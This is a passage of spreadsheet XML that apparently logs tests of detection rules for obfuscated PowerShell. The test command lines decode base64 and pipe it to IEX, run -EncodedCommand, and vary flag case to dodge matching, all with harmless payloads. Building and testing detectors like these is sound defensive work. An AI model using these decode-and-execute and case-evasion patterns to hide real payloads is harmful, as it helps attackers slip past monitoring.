      <c r="B1440" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C1440" s="36" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D1440" s="36" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E1440" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CoMmaND "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('V3JpdGUtSG9zdCAiSGVsbG8i')) | IEX"</t>
        </is>
      </c>
      <c r="F1440" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1440" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1440" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1440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40" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1440" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1441" ht="15.75" customHeight="1" s="42">
      <c r="A1441" s="43" t="n"/>
      <c r="B1441" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C1441" s="36" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D1441" s="36" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E1441" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COMMaNd "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('V3JpdGUtSG9zdCAiSGVsbG8i')) | IEX"</t>
        </is>
      </c>
      <c r="F1441" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1441" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1441" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1441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41" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1441" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1442" ht="15.75" customHeight="1" s="42">
      <c r="A1442" s="43" t="n"/>
      <c r="B1442" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C1442" s="36" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D1442" s="36" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E1442" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CoMmANd "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('V3JpdGUtSG9zdCAiSGVsbG8i')) | IEX"</t>
        </is>
      </c>
      <c r="F1442" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1442" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1442" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1442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42" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1442" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1443" ht="15.75" customHeight="1" s="42">
      <c r="A1443" s="43" t="n"/>
      <c r="B1443" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C1443" s="36" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D1443" s="36" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E1443" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('V3JpdGUtSG9zdCAiSGVsbG8i')) | IEX"</t>
        </is>
      </c>
      <c r="F1443" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1443" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1443" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1443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1443" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1443" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1444" ht="15.75" customHeight="1" s="42">
      <c r="A1444" s="43" t="n"/>
      <c r="B1444" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C1444" s="36" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D1444" s="36" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E1444" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$method = 'FromBase' + '64String'; [Convert]::$method('SGVsbG8gV29ybGQ=')"</t>
        </is>
      </c>
      <c r="F1444" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1444" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1444" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1444" s="43" t="n"/>
      <c r="J1444" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1444" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1445" ht="15.75" customHeight="1" s="42">
      <c r="A1445" s="43" t="n"/>
      <c r="B1445" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C1445" s="36" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D1445" s="36" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E1445" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "$method = 'FromBase' + '64String'; [Convert]::$method('SGVsbG8gV29ybGQ=')"</t>
        </is>
      </c>
      <c r="F1445" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1445" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1445" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1445" s="43" t="n"/>
      <c r="J1445" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1445" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1446" ht="15.75" customHeight="1" s="42">
      <c r="A1446" s="43" t="n"/>
      <c r="B1446" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C1446" s="36" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D1446" s="36" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E1446" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -coMManD "$method = 'FromBase' + '64String'; [Convert]::$method('SGVsbG8gV29ybGQ=')"</t>
        </is>
      </c>
      <c r="F1446" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1446" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1446" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1446" s="43" t="n"/>
      <c r="J1446" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1446" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1447" ht="15.75" customHeight="1" s="42">
      <c r="A1447" s="43" t="n"/>
      <c r="B1447" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C1447" s="36" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D1447" s="36" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E1447" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAYQBsAGMALgBlAHgAZQA=</t>
        </is>
      </c>
      <c r="F1447" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1447" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1447" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1447" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded PowerShell Command Line (ca2092a1-c273-4878-9b4b-0d60115bf5ea); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1447" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1447" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1448" ht="15.75" customHeight="1" s="42">
      <c r="A1448" s="43" t="n"/>
      <c r="B1448" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C1448" s="36" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D1448" s="36" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E1448" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -eNCoDeDcOmmand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAYQBsAGMALgBlAHgAZQA=</t>
        </is>
      </c>
      <c r="F1448" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1448" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1448" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1448" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded PowerShell Command Line (ca2092a1-c273-4878-9b4b-0d60115bf5ea); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1448" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1448" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1449" ht="15.75" customHeight="1" s="42">
      <c r="A1449" s="43" t="n"/>
      <c r="B1449" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C1449" s="36" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D1449" s="36" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E1449" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAYQBsAGMALgBlAHgAZQA=</t>
        </is>
      </c>
      <c r="F1449" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1449" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1449" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1449" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded PowerShell Command Line (ca2092a1-c273-4878-9b4b-0d60115bf5ea); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1449" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1449" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1450" ht="15.75" customHeight="1" s="42">
      <c r="A1450" s="43" t="n"/>
      <c r="B1450" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C1450" s="36" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D1450" s="36" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E1450" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ENcODedCOMMand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAYQBsAGMALgBlAHgAZQA=</t>
        </is>
      </c>
      <c r="F1450" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1450" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1450" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1450" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded PowerShell Command Line (ca2092a1-c273-4878-9b4b-0d60115bf5ea); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1450" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1450" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1451" ht="15.75" customHeight="1" s="42">
      <c r="A1451" s="43" t="n"/>
      <c r="B1451" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C1451" s="36" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D1451" s="36" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E1451" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -enCodedCoMmAnD UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAYQBsAGMALgBlAHgAZQA=</t>
        </is>
      </c>
      <c r="F1451" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1451" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1451" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1451" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded PowerShell Command Line (ca2092a1-c273-4878-9b4b-0d60115bf5ea); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1451" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1451" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1452" ht="15.75" customHeight="1" s="42">
      <c r="A1452" s="43" t="n"/>
      <c r="B1452" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C1452" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D1452" s="36" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E1452" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Write-Host ([char] 0x41)"</t>
        </is>
      </c>
      <c r="F1452" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1452" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1452" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1452" s="43" t="n"/>
      <c r="J1452" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1452" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1453" ht="15.75" customHeight="1" s="42">
      <c r="A1453" s="43" t="n"/>
      <c r="B1453" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C1453" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D1453" s="36" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E1453" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Write-Host ([char] 0x41)"</t>
        </is>
      </c>
      <c r="F1453" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1453" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1453" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1453" s="43" t="n"/>
      <c r="J1453" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1453" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1454" ht="15.75" customHeight="1" s="42">
      <c r="A1454" s="43" t="n"/>
      <c r="B1454" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C1454" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D1454" s="36" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E1454" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -commaND "Write-Host ([char] 0x41)"</t>
        </is>
      </c>
      <c r="F1454" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1454" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1454" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1454" s="43" t="n"/>
      <c r="J1454" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1454" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1455" ht="15.75" customHeight="1" s="42">
      <c r="A1455" s="43" t="n"/>
      <c r="B1455" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C1455" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D1455" s="36" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E1455" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmaND "Write-Host ([char] 0x41)"</t>
        </is>
      </c>
      <c r="F1455" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1455" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1455" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1455" s="43" t="n"/>
      <c r="J1455" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1455" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1456" ht="15.75" customHeight="1" s="42">
      <c r="A1456" s="43" t="n"/>
      <c r="B1456" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C1456" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D1456" s="36" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E1456" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Write-Host ([char]65 + [char]66)"</t>
        </is>
      </c>
      <c r="F1456" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1456" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1456" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1456" s="43" t="n"/>
      <c r="J1456" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1456" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1457" ht="15.75" customHeight="1" s="42">
      <c r="A1457" s="43" t="n"/>
      <c r="B1457" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C1457" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D1457" s="36" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E1457" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -comMAnD "Write-Host ([char]65 + [char]66)"</t>
        </is>
      </c>
      <c r="F1457" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1457" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1457" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1457" s="43" t="n"/>
      <c r="J1457" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1457" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1458" ht="15.75" customHeight="1" s="42">
      <c r="A1458" s="43" t="n"/>
      <c r="B1458" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C1458" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D1458" s="36" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E1458" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Write-Host ([char]65 + [char]66)"</t>
        </is>
      </c>
      <c r="F1458" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1458" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1458" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1458" s="43" t="n"/>
      <c r="J1458" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1458" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1459" ht="15.75" customHeight="1" s="42">
      <c r="A1459" s="43" t="n"/>
      <c r="B1459" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C1459" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D1459" s="36" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E1459" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMMAnD "Write-Host ([char]65 + [char]66)"</t>
        </is>
      </c>
      <c r="F1459" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1459" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1459" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1459" s="43" t="n"/>
      <c r="J1459" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1459" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1460" ht="15.75" customHeight="1" s="42">
      <c r="A1460" s="43" t="n"/>
      <c r="B1460" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C1460" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D1460" s="36" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E1460" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Write-Host ([Convert]::ToChar(0x41))"</t>
        </is>
      </c>
      <c r="F1460" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1460" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1460" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1460" s="43" t="n"/>
      <c r="J1460" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1460" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1461" ht="15.75" customHeight="1" s="42">
      <c r="A1461" s="43" t="n"/>
      <c r="B1461" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C1461" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D1461" s="36" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E1461" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -coMmanD "Write-Host ([Convert]::ToChar(0x41))"</t>
        </is>
      </c>
      <c r="F1461" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1461" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1461" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1461" s="43" t="n"/>
      <c r="J1461" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1461" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1462" ht="15.75" customHeight="1" s="42">
      <c r="A1462" s="43" t="n"/>
      <c r="B1462" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C1462" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D1462" s="36" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E1462" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Write-Host ([Convert]::ToChar(0x41))"</t>
        </is>
      </c>
      <c r="F1462" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1462" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1462" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1462" s="43" t="n"/>
      <c r="J1462" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1462" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1463" ht="15.75" customHeight="1" s="42">
      <c r="A1463" s="43" t="n"/>
      <c r="B1463" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C1463" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D1463" s="36" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E1463" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CommAND "Write-Host ([Convert]::ToChar(0x41))"</t>
        </is>
      </c>
      <c r="F1463" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1463" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1463" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1463" s="43" t="n"/>
      <c r="J1463" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1463" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1464" ht="15.75" customHeight="1" s="42">
      <c r="A1464" s="43" t="n"/>
      <c r="B1464" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C1464" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D1464" s="36" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E1464" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Write-Host ([char]65)"</t>
        </is>
      </c>
      <c r="F1464" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1464" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1464" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1464" s="43" t="n"/>
      <c r="J1464" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1464" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1465" ht="15.75" customHeight="1" s="42">
      <c r="A1465" s="43" t="n"/>
      <c r="B1465" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C1465" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D1465" s="36" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E1465" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ComMand "Write-Host ([char]65)"</t>
        </is>
      </c>
      <c r="F1465" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1465" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1465" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1465" s="43" t="n"/>
      <c r="J1465" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1465" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1466" ht="15.75" customHeight="1" s="42">
      <c r="A1466" s="43" t="n"/>
      <c r="B1466" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C1466" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D1466" s="36" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E1466" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Write-Host ([char]65)"</t>
        </is>
      </c>
      <c r="F1466" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1466" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1466" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1466" s="36" t="n"/>
      <c r="J1466" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1466" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1467" ht="15.75" customHeight="1" s="42">
      <c r="A1467" s="43" t="n"/>
      <c r="B1467" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C1467" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D1467" s="36" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E1467" s="36" t="inlineStr">
        <is>
